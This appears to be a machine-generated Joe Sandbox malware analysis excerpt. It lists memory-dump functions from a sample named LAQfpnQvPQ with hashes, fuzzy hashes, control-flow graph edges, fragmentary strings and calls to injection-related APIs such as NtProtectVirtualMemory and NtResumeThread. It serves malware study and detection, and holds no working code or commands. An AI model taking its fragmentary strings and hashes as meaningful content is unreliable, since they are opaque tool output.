                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                          • API String ID: 0-3443518476
                                                                          • Opcode ID: 883f378dce5678542cc007f5996aa23def032542e8e3b07e8be7c3d76fa27682
                                                                          • Instruction ID: 6ef91e47b3a04c2b2a6d4d9f66b6890625162c58592e3f89c9eb871235463e13
                                                                          • Opcode Fuzzy Hash: 883f378dce5678542cc007f5996aa23def032542e8e3b07e8be7c3d76fa27682
                                                                          • Instruction Fuzzy Hash: CDB227B4A00219CFDB14CFA8C994BADB7B6FF48741F158599E905AB3A5CBB0AC41CF50
                                                                          Function 077506FF Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                          • API String ID: 0-324474496
                                                                          • Opcode ID: bdcfd64be3be1f33b67feb7ab023cbba60728eb62e2dd2275fbb3bf3281a35f9
                                                                          • Instruction ID: c1e55527e3be89cddf6b52f00e677d0fd43d1276a7e2f7fc9f397fa0273275b0
                                                                          • Opcode Fuzzy Hash: bdcfd64be3be1f33b67feb7ab023cbba60728eb62e2dd2275fbb3bf3281a35f9
                                                                          • Instruction Fuzzy Hash: D5221BB4A00219CFDB14CF68C984BADB7B1FF48741F1485A9D909AB3A5DB71AD81CF50
                                                                          Function 075D4A70 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1169 75d4a70-75d4a91 1170 75d4a98-75d4b7f 1169->1170 1171 75d4a93 1169->1171 1173 75d4b85-75d4cc6 1170->1173 1174 75d5281-75d52a9 1170->1174 1171->1170 1218 75d4ccc-75d4d27 1173->1218 1219 75d524a-75d5274 1173->1219 1177 75d59af-75d59b8 1174->1177 1179 75d59be-75d59d5 1177->1179 1180 75d52b7-75d52c1 1177->1180 1181 75d52c8-75d53bc 1180->1181 1182 75d52c3 1180->1182 1201 75d53be-75d53ca 1181->1201 1202 75d53e6 1181->1202 1182->1181 1204 75d53cc-75d53d2 1201->1204 1205 75d53d4-75d53da 1201->1205 1203 75d53ec-75d540c 1202->1203 1209 75d546c-75d54ec 1203->1209 1210 75d540e-75d5467 1203->1210 1206 75d53e4 1204->1206 1205->1206 1206->1203 1232 75d54ee-75d5541 1209->1232 1233 75d5543-75d5586 1209->1233 1224 75d59ac 1210->1224 1226 75d4d2c-75d4d37 1218->1226 1227 75d4d29 1218->1227 1229 75d527e 1219->1229 1230 75d5276 1219->1230 1224->1177 1231 75d515f-75d5165 1226->1231 1227->1226 1229->1174 1230->1229 1234 75d4d3c-75d4d5a 1231->1234 1235 75d516b-75d51e7 1231->1235 1255 75d5591-75d559a 1232->1255 1233->1255 1237 75d4d5c-75d4d60 1234->1237 1238 75d4db1-75d4dc6 1234->1238 1276 75d5234-75d523a 1235->1276 1237->1238 1242 75d4d62-75d4d6d 1237->1242 1240 75d4dcd-75d4de3 1238->1240 1241 75d4dc8 1238->1241 1245 75d4dea-75d4e01 1240->1245 1246 75d4de5 1240->1246 1241->1240 1247 75d4da3-75d4da9 1242->1247 1252 75d4e08-75d4e1e 1245->1252 1253 75d4e03 1245->1253 1246->1245 1249 75d4d6f-75d4d73 1247->1249 1250 75d4dab-75d4dac 1247->1250 1256 75d4d79-75d4d91 1249->1256 1257 75d4d75 1249->1257 1254 75d4e2f-75d4e9a 1250->1254 1258 75d4e25-75d4e2c 1252->1258 1259 75d4e20 1252->1259 1253->1252 1265 75d4e9c-75d4ea8 1254->1265 1266 75d4eae-75d5063 1254->1266 1262 75d55fa-75d5609 1255->1262 1263 75d4d98-75d4da0 1256->1263 1264 75d4d93 1256->1264 1257->1256 1258->1254 1259->1258 1267 75d559c-75d55c4 1262->1267 1268 75d560b-75d5693 1262->1268 1263->1247 1264->1263 1265->1266 1274 75d5065-75d5069 1266->1274 1275 75d50c7-75d50dc 1266->1275 1271 75d55cb-75d55f4 1267->1271 1272 75d55c6 1267->1272 1303 75d580c-75d5818 1268->1303 1271->1262 1272->1271 1274->1275 1277 75d506b-75d507a 1274->1277 1281 75d50de 1275->1281 1282 75d50e3-75d5104 1275->1282 1279 75d523c-75d5242 1276->1279 1280 75d51e9-75d5231 1276->1280 1286 75d50b9-75d50bf 1277->1286 1279->1219 1280->1276 1281->1282 1283 75d510b-75d512a 1282->1283 1284 75d5106 1282->1284 1287 75d512c 1283->1287 1288 75d5131-75d5151 1283->1288 1284->1283 1290 75d507c-75d5080 1286->1290 1291 75d50c1-75d50c2 1286->1291 1287->1288 1296 75d5158 1288->1296 1297 75d5153 1288->1297 1294 75d508a-75d50ab 1290->1294 1295 75d5082-75d5086 1290->1295 1298 75d515c 1291->1298 1299 75d50ad 1294->1299 1300 75d50b2-75d50b6 1294->1300 1295->1294 1296->1298 1297->1296 1298->1231 1299->1300 1300->1286 1305 75d581e-75d5879 1303->1305 1306 75d5698-75d56a1 1303->1306 1321 75d587b-75d58ae 1305->1321 1322 75d58b0-75d58da 1305->1322 1307 75d56aa-75d5800 1306->1307 1308 75d56a3 1306->1308 1323 75d5806 1307->1323 1308->1307 1310 75d577f-75d57bf 1308->1310 1311 75d573a-75d577a 1308->1311 1312 75d56f5-75d5735 1308->1312 1313 75d56b0-75d56f0 1308->1313 1310->1323 1311->1323 1312->1323 1313->1323 1330 75d58e3-75d5976 1321->1330 1322->1330 1323->1303 1334 75d597d-75d599d 1330->1334 1334->1224
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )ce$TJbq$Te]q$paq$xb`q
                                                                          • API String ID: 0-2577628760
                                                                          • Opcode ID: 00230841caaa14adc72bb7012ba06ca611a7e58b7c1b0070d0b6460066d3e965
                                                                          • Instruction ID: e41adb44312e8bb08c6c7265242cb71e786b79dc4862a112816f974536ebc117
                                                                          • Opcode Fuzzy Hash: 00230841caaa14adc72bb7012ba06ca611a7e58b7c1b0070d0b6460066d3e965
                                                                          • Instruction Fuzzy Hash: 33A2C375A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40
                                                                          Function 075D5D50 Relevance: 3.8, Strings: 2, Instructions: 1345COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1900 75d5d50-75d5d8e 1901 75d5d95-75d5eb7 1900->1901 1902 75d5d90 1900->1902 1906 75d5eb9-75d5ecf 1901->1906 1907 75d5edb-75d5ee7 1901->1907 1902->1901 2184 75d5ed5 call 75d88f0 1906->2184 2185 75d5ed5 call 75d88e0 1906->2185 1908 75d5eee-75d5ef3 1907->1908 1909 75d5ee9 1907->1909 1910 75d5f2b-75d5f74 1908->1910 1911 75d5ef5-75d5f01 1908->1911 1909->1908 1921 75d5f7b-75d6240 1910->1921 1922 75d5f76 1910->1922 1913 75d5f08-75d5f26 1911->1913 1914 75d5f03 1911->1914 1915 75d768f-75d7695 1913->1915 1914->1913 1917 75d7697-75d76b7 1915->1917 1918 75d76c0 1915->1918 1917->1918 1947 75d6c70-75d6c7c 1921->1947 1922->1921 1948 75d6245-75d6251 1947->1948 1949 75d6c82-75d6cba 1947->1949 1950 75d6258-75d6282 1948->1950 1951 75d6253 1948->1951 1958 75d6d94-75d6d9a 1949->1958 1955 75d628e-75d637d 1950->1955 1951->1950 1986 75d63bd-75d6446 1955->1986 1987 75d637f-75d63b7 1955->1987 1959 75d6cbf-75d6d3c 1958->1959 1960 75d6da0-75d6dd8 1958->1960 1975 75d6d6f-75d6d91 1959->1975 1976 75d6d3e-75d6d42 1959->1976 1970 75d7136-75d713c 1960->1970 1973 75d6ddd-75d6fdf 1970->1973 1974 75d7142-75d718a 1970->1974 2067 75d707e-75d7082 1973->2067 2068 75d6fe5-75d7079 1973->2068 1983 75d718c-75d71ff 1974->1983 1984 75d7205-75d7250 1974->1984 1975->1958 1976->1975 1979 75d6d44-75d6d6c 1976->1979 1979->1975 1983->1984 2004 75d7659-75d765f 1984->2004 2014 75d6448-75d6450 1986->2014 2015 75d6455-75d64d9 1986->2015 1987->1986 2007 75d7255-75d72d7 2004->2007 2008 75d7665-75d768d 2004->2008 2027 75d72ff-75d730b 2007->2027 2028 75d72d9-75d72f4 2007->2028 2008->1915 2017 75d6c61-75d6c6d 2014->2017 2040 75d64e8-75d656c 2015->2040 2041 75d64db-75d64e3 2015->2041 2017->1947 2029 75d730d 2027->2029 2030 75d7312-75d731e 2027->2030 2028->2027 2029->2030 2032 75d7331-75d7340 2030->2032 2033 75d7320-75d732c 2030->2033 2038 75d7349-75d7621 2032->2038 2039 75d7342 2032->2039 2037 75d7640-75d7656 2033->2037 2037->2004 2073 75d762c-75d7638 2038->2073 2039->2038 2042 75d73bd-75d7435 2039->2042 2043 75d734f-75d73b8 2039->2043 2044 75d74a8-75d7511 2039->2044 2045 75d743a-75d74a3 2039->2045 2046 75d7516-75d757e 2039->2046 2092 75d656e-75d6576 2040->2092 2093 75d657b-75d65ff 2040->2093 2041->2017 2042->2073 2043->2073 2044->2073 2045->2073 2079 75d75f2-75d75f8 2046->2079 2075 75d70df-75d711c 2067->2075 2076 75d7084-75d70dd 2067->2076 2090 75d711d-75d7133 2068->2090 2073->2037 2075->2090 2076->2090 2081 75d75fa-75d7604 2079->2081 2082 75d7580-75d75de 2079->2082 2081->2073 2098 75d75e5-75d75ef 2082->2098 2099 75d75e0 2082->2099 2090->1970 2092->2017 2105 75d660e-75d6692 2093->2105 2106 75d6601-75d6609 2093->2106 2098->2079 2099->2098 2112 75d6694-75d669c 2105->2112 2113 75d66a1-75d6725 2105->2113 2106->2017 2112->2017 2119 75d6734-75d67b8 2113->2119 2120 75d6727-75d672f 2113->2120 2126 75d67ba-75d67c2 2119->2126 2127 75d67c7-75d684b 2119->2127 2120->2017 2126->2017 2133 75d684d-75d6855 2127->2133 2134 75d685a-75d68de 2127->2134 2133->2017 2140 75d68ed-75d6971 2134->2140 2141 75d68e0-75d68e8 2134->2141 2147 75d6980-75d6a04 2140->2147 2148 75d6973-75d697b 2140->2148 2141->2017 2154 75d6a06-75d6a0e 2147->2154 2155 75d6a13-75d6a97 2147->2155 2148->2017 2154->2017 2161 75d6a99-75d6aa1 2155->2161 2162 75d6aa6-75d6b2a 2155->2162 2161->2017 2168 75d6b2c-75d6b34 2162->2168 2169 75d6b39-75d6bbd 2162->2169 2168->2017 2175 75d6bcc-75d6c50 2169->2175 2176 75d6bbf-75d6bc7 2169->2176 2182 75d6c5c-75d6c5e 2175->2182 2183 75d6c52-75d6c5a 2175->2183 2176->2017 2182->2017 2183->2017 2184->1907 2185->1907
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2$$]q
                                                                          • API String ID: 0-351713980
                                                                          • Opcode ID: 7cce97c6e1d7eff62ef5f5a005b8ac1bb3015e877827dec37a187b278cabdabc
                                                                          • Instruction ID: 2c845ccf90dbf5d607b256462a83c984d2463f0f2193f12f834700ddf98b483e
                                                                          • Opcode Fuzzy Hash: 7cce97c6e1d7eff62ef5f5a005b8ac1bb3015e877827dec37a187b278cabdabc
                                                                          • Instruction Fuzzy Hash: F6E2F3B4A012298FDB64DF69D884ADABBF5FB89301F1081EAD409A7354DB349E85CF50
                                                                          Function 077FB508 Relevance: 3.1, Strings: 2, Instructions: 612COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2335 77fb508-77fb529 2336 77fb52b 2335->2336 2337 77fb530-77fb5aa call 77f5d38 call 77fbfb8 2335->2337 2336->2337 2342 77fb5b0-77fb5ed 2337->2342 2344 77fb5ef-77fb5fa 2342->2344 2345 77fb5fc 2342->2345 2346 77fb606-77fb721 2344->2346 2345->2346 2357 77fb733-77fb75e 2346->2357 2358 77fb723-77fb729 2346->2358 2359 77fbf1e-77fbf3a 2357->2359 2358->2357 2360 77fb763-77fb8c6 call 77fa498 2359->2360 2361 77fbf40-77fbf5b 2359->2361 2372 77fb8d8-77fba6d call 77f7f18 call 77f4170 2360->2372 2373 77fb8c8-77fb8ce 2360->2373 2385 77fba6f-77fba73 2372->2385 2386 77fbad2-77fbad9 2372->2386 2373->2372 2388 77fba7b-77fbacd 2385->2388 2389 77fba75-77fba76 2385->2389 2387 77fbcf7-77fbd13 2386->2387 2391 77fbade-77fbc21 call 77fa498 2387->2391 2392 77fbd19-77fbd43 2387->2392 2390 77fbd99-77fbe04 2388->2390 2389->2390 2409 77fbe16-77fbe61 2390->2409 2410 77fbe06-77fbe0c 2390->2410 2421 77fbc27-77fbcf0 call 77fa498 2391->2421 2422 77fbcf3-77fbcf4 2391->2422 2397 77fbd96-77fbd97 2392->2397 2398 77fbd45-77fbd93 2392->2398 2397->2390 2398->2397 2411 77fbe67-77fbeff 2409->2411 2412 77fbf00-77fbf1b 2409->2412 2410->2409 2411->2412 2412->2359 2421->2422 2422->2387
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fbq$8
                                                                          • API String ID: 0-3186246319
                                                                          • Opcode ID: 4e41d9290657485f0b748a1f530a2c266f745115c7f8c7c1d6f962cc8b7047cd
                                                                          • Instruction ID: 2a0ce1e6024d66bb6dd0aaa9d14c888841f629c25a01c5d8fad32fd8c1852eaf
                                                                          • Opcode Fuzzy Hash: 4e41d9290657485f0b748a1f530a2c266f745115c7f8c7c1d6f962cc8b7047cd
                                                                          • Instruction Fuzzy Hash: 4552D7B5D01629CFDB64DF69C890AD9B7B1FB89300F5086EAD509A7350DB34AE81CF50
                                                                          Function 077FB4F8 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fbq$h
                                                                          • API String ID: 0-3598783323
                                                                          • Opcode ID: 3af0457f870d36be4d10204fb7137e3e9a4d30b774748c74c194307a72996039
                                                                          • Instruction ID: f2c58c3bf62a0f37ae81cee067254ce20c5f9f593c5e61415277baa2afaac3d9
                                                                          • Opcode Fuzzy Hash: 3af0457f870d36be4d10204fb7137e3e9a4d30b774748c74c194307a72996039
                                                                          • Instruction Fuzzy Hash: BB7129B1E01628CBDB64DF6AC850BD9BBB2FF89310F5482AAD50DA7250DB345E85CF50
                                                                          Function 069F06B8 Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: bcf27ec0168ad734be318def112d94b5b8c4b88b3850d8736890468fb3e6679a
                                                                          • Instruction ID: e42e8b674f1d88e7c3aa7feb174490a66f01c4a301f2f21cd29e3496fbf26f6c
                                                                          • Opcode Fuzzy Hash: bcf27ec0168ad734be318def112d94b5b8c4b88b3850d8736890468fb3e6679a
                                                                          • Instruction Fuzzy Hash: 7C327C70B013168FCB54CF69C4A466EFBF6BF88300F25892AD65AD7752DB34A801CB91
                                                                          Function 0762C5B1 Relevance: 1.7, Strings: 1, Instructions: 479COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 54caa9c219dec806b14e40f5f8414894903c1dfaa6e8ec8a7419b1b957d0594a
                                                                          • Instruction ID: 2eb5ff3f03c03547bfdf3c605e35e59bf521b52a5d7ca34cb511559c8b8844c5
                                                                          • Opcode Fuzzy Hash: 54caa9c219dec806b14e40f5f8414894903c1dfaa6e8ec8a7419b1b957d0594a
                                                                          • Instruction Fuzzy Hash: D5223CB4A01629CFDBA4DF69C850B9DB7F2FB89300F1091A9D40AA7354DB349D86DF60
                                                                          Function 0762C5C0 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: f13bb8f0ac693ede820907f9a2816021fc8356a566e8f7a59991d1a345a37f70
                                                                          • Instruction ID: 376c360f2fa9f567453ed37299843167920e500dca264ca81e3a42a50130601f
                                                                          • Opcode Fuzzy Hash: f13bb8f0ac693ede820907f9a2816021fc8356a566e8f7a59991d1a345a37f70
                                                                          • Instruction Fuzzy Hash: 20124CB0A05628CFDBA4DF69C850B9DB7F2FB89300F1091A9D40AA7354DB349D86DF60
                                                                          Function 077FE8B0 Relevance: 1.6, APIs: 1, Instructions: 72nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 077FE941
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 3a781b7ba8e9f29488e6774ac0afca33ddfe5a786aab216de21d126055f9cba1
                                                                          • Instruction ID: 0d6aa708a309f3c6ba3deeb099017ee3a831e52f6b5e67c89463896da9ecc2c8
                                                                          • Opcode Fuzzy Hash: 3a781b7ba8e9f29488e6774ac0afca33ddfe5a786aab216de21d126055f9cba1
                                                                          • Instruction Fuzzy Hash: 652126B0D012499FCB10DFAAD980AEEFBF5FF48310F208429E518A7310C775A941CBA4
                                                                          Function 077FE8B8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 077FE941
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 97ebca1aed4a4e8c1d3b927a854b5e549709f7d44686c128b266452deb70b880
                                                                          • Instruction ID: 779a90506f66264dfc6a29f5fc9173dcfab7db1d6401338792d05ee07cc522d2
                                                                          • Opcode Fuzzy Hash: 97ebca1aed4a4e8c1d3b927a854b5e549709f7d44686c128b266452deb70b880
                                                                          • Instruction Fuzzy Hash: 9121E3B1D013499FCB10DFAAD984AEEFBF5FF48310F60842AE559A7250C775A940CBA1
                                                                          Function 069FEF90 Relevance: 1.6, APIs: 1, Instructions: 61nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 069FF006
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: fce8d16228318502b056a5576e82cecaa3f3b8e0e0da37df287018f9a18ff06f
                                                                          • Instruction ID: c6cb4a6bcfd2dadc30862e5d1ab175232ddf04fb6c20752ce4f5bfa4d441bdb6
                                                                          • Opcode Fuzzy Hash: fce8d16228318502b056a5576e82cecaa3f3b8e0e0da37df287018f9a18ff06f
                                                                          • Instruction Fuzzy Hash: 2E2165B1D002488EDB10DFAAC484AEEFBF8FF48320F60842AD519B7200C7789844CBA4
                                                                          Function 069FEF98 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 069FF006
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 9801d21399a1f07c11d7fea4eda286279c1aeab4e0f10c1e98f311b300e78df2
                                                                          • Instruction ID: 2824dd5064fda0900cec4a0fe6dda4e4575dcf9f4a0ffc4b637fe650ac7992b0
                                                                          • Opcode Fuzzy Hash: 9801d21399a1f07c11d7fea4eda286279c1aeab4e0f10c1e98f311b300e78df2
                                                                          • Instruction Fuzzy Hash: 911117B1D002088ECB10DFAAC444AAEFBF4FF49310F64842AD519A7240CB78A944CFA5
                                                                          Function 069F5940 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PH]q
                                                                          • API String ID: 0-3168235125
                                                                          • Opcode ID: 71bb109b27d780d6ca426badd7503d2c189c396bbbbc35a137acdc13988a2dd4
                                                                          • Instruction ID: 08f54a9428b45b929348c60b9b3d8de3c4778bb2f69ac946b2a0c31ae3835715
                                                                          • Opcode Fuzzy Hash: 71bb109b27d780d6ca426badd7503d2c189c396bbbbc35a137acdc13988a2dd4
                                                                          • Instruction Fuzzy Hash: 41D15770E15218CFEBA4DFA9D488BADBBF2FB59300F5280AAC109A7644C7749D85CF51
                                                                          Function 076244E8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 9305a491e9b653a2abee374ab2f4e35fc96867f4ce7b5eb54ed24ca8e6ae693d
                                                                          • Instruction ID: 7f1615f3fd7445fbb4f8a725bd975c3c119cf09e622260666039031c7536d108
                                                                          • Opcode Fuzzy Hash: 9305a491e9b653a2abee374ab2f4e35fc96867f4ce7b5eb54ed24ca8e6ae693d
                                                                          • Instruction Fuzzy Hash: 9FB128B4E05668CFDB64DF69D984B9DBBF2FB4A300F109069D40AAB251DB349D86CF00
                                                                          Function 076249F1 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7
                                                                          • API String ID: 0-1790921346
                                                                          • Opcode ID: 8ba18911230118fd3be7a7bf8c76dcd9238a134143beba82053d41da8ff23e7f
                                                                          • Instruction ID: 5227cd6a33aa35d88a568209bad199e72b1ab008e30fd53239df8693f7ee6ec3
                                                                          • Opcode Fuzzy Hash: 8ba18911230118fd3be7a7bf8c76dcd9238a134143beba82053d41da8ff23e7f
                                                                          • Instruction Fuzzy Hash: 86417EB1E15A588BEB58CF6BDC4429AFAF7BFC9201F14D1B9980DA6254EF3409469F00
                                                                          Function 0759EF18 Relevance: .6, Instructions: 609COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a61e03b729207f2adad4cf96254a08ff1360c89684683c1d6dd5a0d8053e0c
                                                                          • Instruction ID: da7c95aa9c6c5c7c0e86d2bbedb742f10ffb9c4304933883e2214a06a1543f9e
                                                                          • Opcode Fuzzy Hash: 52a61e03b729207f2adad4cf96254a08ff1360c89684683c1d6dd5a0d8053e0c
                                                                          • Instruction Fuzzy Hash: D43289B1B012069FDB18DB69C554BAEB7F6BF89300F24446AE106DB3A4DB35ED01CB91
                                                                          Function 075D76C3 Relevance: .5, Instructions: 539COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca507a63c7d82445c81b5bd6829afd3a188e0f9c86d3c152cff710117053d0c6
                                                                          • Instruction ID: 54e9c961fb7e8080c3fe72d79c0c26522413b2bc4846c620c65b14a3ed8d8694
                                                                          • Opcode Fuzzy Hash: ca507a63c7d82445c81b5bd6829afd3a188e0f9c86d3c152cff710117053d0c6
                                                                          • Instruction Fuzzy Hash: 0C52C5B4A056298FCB60DF28C984B9AB7F6FB89301F1085D9D90DA7355DB34AE84CF50
                                                                          Function 07623A10 Relevance: .3, Instructions: 341COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecdc09986e6ee6b87797585e0f9d2e5046f87290e0ed7925c0e203408749a682
                                                                          • Instruction ID: 536c3c065b558bc18ff5d620b6307d1f7a782a564f47f21174ba83c66dfd53ab
                                                                          • Opcode Fuzzy Hash: ecdc09986e6ee6b87797585e0f9d2e5046f87290e0ed7925c0e203408749a682
                                                                          • Instruction Fuzzy Hash: 8CE1F9B0E01629CFDBA4CF6AD584B9DBBF2BF49304F1090AAD419A7351DB385986DF00
                                                                          Function 07623A20 Relevance: .3, Instructions: 340COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
